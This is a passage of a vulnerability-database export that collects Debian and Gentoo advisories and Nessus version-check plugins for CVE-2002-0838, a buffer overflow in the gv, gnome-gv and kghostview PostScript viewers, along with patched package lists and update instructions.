apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_2.2.2-6.8.dsc\n Size/MD5 checksum: 978 92a3fa3751c538608857c57a713a9487\n http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_2.2.2-6.8.diff.gz\n Size/MD5 checksum: 59276 fe7f3a7ed39f52457efca69226bccc33\n http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_2.2.2.orig.tar.gz\n Size/MD5 checksum: 1640320 4dc8538c4c8dd8b13ef4f8e62446d777\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_alpha.deb\n Size/MD5 checksum: 165978 fba04ef31acd55249d3df119b6712444\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_arm.deb\n Size/MD5 checksum: 146588 b76885389c6d29dbd11db488385b395f\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_i386.deb\n Size/MD5 checksum: 146264 e574c2d69f9392ce94a9a03d1297a218\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_ia64.deb\n Size/MD5 checksum: 197724 9a35cfc75c5672a0ddba1c17a9d9d62e\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_hppa.deb\n Size/MD5 checksum: 171188 0c683f2d0f8f667c93ded25dde41332f\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_m68k.deb\n Size/MD5 checksum: 142828 68fa4e43a0af7a2d024c55da219b99ad\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_mips.deb\n Size/MD5 checksum: 138378 842a9be4b081394452ec550cc564d0b7\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_mipsel.deb\n Size/MD5 checksum: 136866 d884fae95437379052339da29ccc5afd\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_powerpc.deb\n Size/MD5 checksum: 146622 fbf4c9b3164b0a0f3329df556ec722be\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_s390.deb\n Size/MD5 checksum: 146122 eea9e2c0f0bb23303ee0e29e95a6e3e4\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_sparc.deb\n Size/MD5 checksum: 148240 62902f062d14a4c6a6794d1368be49d4\n\n\n Please note that the source packages mentioned above produce more\n binary packages than the ones listed above. They are not relevant\n for the fixed problems, though.\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2002-10-28T00:00:00", "published": "2002-10-28T00:00:00", "id": "DEBIAN:DSA-182-1:BF38F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00105.html", "title": "[SECURITY] [DSA 182-1] New kghostview packages fix buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:01", "bulletinFamily": "unix", "cvelist": ["CVE-2002-0838"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 179-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 18th, 2002 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : gnome-gv\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE Id : CAN-2002-0838\nBugTraq ID : 5808\n\nZen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in gnome-gv. This problem\nis triggered by scanning the PostScript file and can be exploited by\nan attacker sending a malformed PostScript or PDF file. The attacker\nis able to cause arbitrary code to be run with the privileges of the\nvictim.\n\nThis problem has been fixed in version 1.1.96-3.1 for the current\nstable distribution (woody), in version 0.82-2.1 for the old stable\ndistribution (potato) and version 1.99.7-9 for the unstable\ndistribution (sid).\n\nWe recommend that you upgrade your gnome-gv package.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1.dsc\n Size/MD5 checksum: 807 82140169547f88c38b9965be1bc9a69c\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1.diff.gz\n Size/MD5 checksum: 8494 103905f14d882282d0e976a29111bbb2\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82.orig.tar.gz\n Size/MD5 checksum: 369538 c4542420f0f7aeafea6764718b398341\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_alpha.deb\n Size/MD5 checksum: 145076 05ebc47d64924740b4a6efced375ed00\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_arm.deb\n Size/MD5 checksum: 131928 44f502cc48717739484999b677b23e52\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_i386.deb\n Size/MD5 checksum: 131118 7d2712b05b78e757568efabee83c9bc0\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_m68k.deb\n Size/MD5 checksum: 126710 38225171738cca0d10b9c1f91313ad0d\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_powerpc.deb\n Size/MD5 checksum: 132002 b3208e369afc8754480f80f6aa2b11c5\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_sparc.deb\n Size/MD5 checksum: 136274 156b99fa91b627e91f5e2c3dde50ffc7\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1.dsc\n Size/MD5 checksum: 831 4f3c53098ca78e9532f62778f0cf3b0a\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1.diff.gz\n Size/MD5 checksum: 23903 b33d66f44f186f88829a0537da99d549\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96.orig.tar.gz\n Size/MD5 checksum: 742271 5d80db150adb4bfc5398d8a90ee2f9dd\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_alpha.deb\n Size/MD5 checksum: 340232 87adcdb4e9ef30d25b95734555f3c134\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_arm.deb\n Size/MD5 checksum: 325244 4a5e426144987c2ab8372976ef65c34e\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_i386.deb\n Size/MD5 checksum: 320834 73fc7baeba28750356b628eac22e7ec7\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_ia64.deb\n Size/MD5 checksum: 380740 e814ebf7089f0717e8d86912ed38cf4b\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_hppa.deb\n Size/MD5 checksum: 345956 f9bfa25c891ea680d15e2c68498ba7cc\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_m68k.deb\n Size/MD5 checksum: 314324 dfee84b168b5acc1f2ae7239f7d07f28\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_mips.deb\n Size/MD5 checksum: 316934 fc8f5c0c4c71b69acce97f7666187f27\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_mipsel.deb\n Size/MD5 checksum: 315270 4d65c8f3619a14e4f0e8df6e8a3c897b\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_powerpc.deb\n Size/MD5 checksum: 322280 4cf75a0c3f3ba1cc625ee6a13009f43a\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_s390.deb\n Size/MD5 checksum: 321032 60c0866b15e838f97fcdb11380d94aea\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_sparc.deb\n Size/MD5 checksum: 342248 52513f97ca364ed7978f8050a19c4ef2\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2002-10-18T00:00:00", "published": "2002-10-18T00:00:00", "id": "DEBIAN:DSA-179-1:3F636", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00102.html", "title": "[SECURITY] [DSA 179-1] New gnome-gv packages fix buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:02", "bulletinFamily": "unix", "cvelist": ["CVE-2002-0838"], "description": "### Background\n\ngv is a PostScript and PDF viewer for X which provides a user interface for the ghostscript interpreter. \n\n### Description\n\ngv contains a buffer overflow vulnerability where an unsafe sscanf() call is used to interpret PDF and PostScript files. \n\n### Impact\n\nBy enticing a user to view a malformed PDF or PostScript file an attacker could execute arbitrary code with the permissions of the user running gv. \n\n### Workaround\n\nThere is no known workaround at this time. All users are encouraged to upgrade to the latest available version of gv. \n\n### Resolution\n\nAll gv users should upgrade to the latest version: \n \n \n # emerge sync\n \n # emerge -pv \">=app-text/gv-3.5.8-r4\"\n # emerge \">=app-text/gv-3.5.8-r4\"", "edition": 1, "modified": "2004-08-12T00:00:00", "published": "2004-08-12T00:00:00", "id": "GLSA-200408-10", "href": "https://security.gentoo.org/glsa/200408-10", "type": "gentoo", "title": "gv: Exploitable Buffer Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-06T09:45:19", "description": "Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. This problem is triggered by scanning the PostScript\nfile and can be exploited by an attacker sending a malformed\nPostScript or PDF file. The attacker is able to cause arbitrary code\nto be run with the privileges of the victim.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-176-1 : gv - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "p-cpe:/a:debian:debian_linux:gv", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-176.NASL", "href": "https://www.tenable.com/plugins/nessus/15013", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-176. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15013);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_xref(name:\"DSA\", value:\"176\");\n\n script_name(english:\"Debian DSA-176-1 : gv - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. This problem is triggered by scanning the PostScript\nfile and can be exploited by an attacker sending a malformed\nPostScript or PDF file. The attacker is able to cause arbitrary code\nto be run with the privileges of the victim.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2002/dsa-176\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gv package.\n\nThis problem has been fixed in version 3.5.8-26.1 for the current\nstable distribution (woody), in version 3.5.8-17.1 for the old stable\ndistribution (potato) and version 3.5.8-27 for the unstable\ndistribution (sid).\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"gv\", reference:\"3.5.8-17.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"gv\", reference:\"3.5.8-26.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:45:22", "description": "Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in gnome-gv. This problem is\ntriggered by scanning the PostScript file and can be exploited by an\nattacker sending a malformed PostScript or PDF file. The attacker is\nable to cause arbitrary code to be run with the privileges of the\nvictim.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-179-1 : gnome-gv - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:gnome-gv"], "id": "DEBIAN_DSA-179.NASL", "href": "https://www.tenable.com/plugins/nessus/15016", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-179. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15016);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_xref(name:\"DSA\", value:\"179\");\n\n script_name(english:\"Debian DSA-179-1 : gnome-gv - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in gnome-gv. This problem is\ntriggered by scanning the PostScript file and can be exploited by an\nattacker sending a malformed PostScript or PDF file. The attacker is\nable to cause arbitrary code to be run with the privileges of the\nvictim.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2002/dsa-179\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gnome-gv package.\n\nThis problem has been fixed in version 1.1.96-3.1 for the current\nstable distribution (woody), in version 0.82-2.1 for the old stable\ndistribution (potato) and version 1.99.7-9 for the unstable\ndistribution (sid).\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gnome-gv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"gnome-gv\", reference:\"0.82-2.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"gnome-gv\", reference:\"1.1.96-3.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:45:31", "description": "Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in kghostview which is part\nof the KDE-Graphics package. This problem is triggered by scanning the\nPostScript file and can be exploited by an attacker sending a\nmalformed PostScript or PDF file. The attacker is able to cause\narbitrary code to be run with the privileges of the victim.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-182-1 : kdegraphics - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kdegraphics"], "id": "DEBIAN_DSA-182.NASL", "href": "https://www.tenable.com/plugins/nessus/15019", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-182. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15019);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_xref(name:\"DSA\", value:\"182\");\n\n script_name(english:\"Debian DSA-182-1 : kdegraphics - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in kghostview which is part\nof the KDE-Graphics package. This problem is triggered by scanning the\nPostScript file and can be exploited by an attacker sending a\nmalformed PostScript or PDF file. The attacker is able to cause\narbitrary code to be run with the privileges of the victim.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2002/dsa-182\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the kghostview package.\n\nThis problem has been fixed in version 2.2.2-6.8 for the current\nstable distribution (woody) and in version 2.2.2-6.9 for the unstable\ndistribution (sid). The old stable distribution (potato) is not\naffected since no KDE is included.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kdegraphics\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kamera\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kcoloredit\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kfract\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kghostview\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kiconedit\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kooka\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kpaint\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kruler\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"ksnapshot\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kview\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libkscan-dev\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libkscan1\", reference:\"2.2.2-6.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:17", "description": "A buffer overflow was discovered in gv versions 3.5.8 and earlier by\nZen Parse. The problem is triggered by scanning a file and can be\nexploited by an attacker sending a malformed PostScript or PDF file.\nThis would result in arbitrary code being executed with the privilege\nof the user viewing the file. ggv uses code derived from gv and has\nthe same vulnerability. These updates provide patched versions of gv\nand ggv to fix the vulnerabilities.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : gv (MDKSA-2002:069)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "modified": "2004-07-31T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:8.2", "cpe:/o:mandrakesoft:mandrake_linux:8.0", "cpe:/o:mandrakesoft:mandrake_linux:9.0", "p-cpe:/a:mandriva:linux:ggv", "cpe:/o:mandrakesoft:mandrake_linux:8.1", "p-cpe:/a:mandriva:linux:gv"], "id": "MANDRAKE_MDKSA-2002-069.NASL", "href": "https://www.tenable.com/plugins/nessus/13969", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2002:069. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13969);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_xref(name:\"MDKSA\", value:\"2002:069\");\n\n script_name(english:\"Mandrake Linux Security Advisory : gv (MDKSA-2002:069)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow was discovered in gv versions 3.5.8 and earlier by\nZen Parse. The problem is triggered by scanning a file and can be\nexploited by an attacker sending a malformed PostScript or PDF file.\nThis would result in arbitrary code being executed with the privilege\nof the user viewing the file. ggv uses code derived from gv and has\nthe same vulnerability. These updates provide patched versions of gv\nand ggv to fix the vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ggv and / or gv packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ggv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n 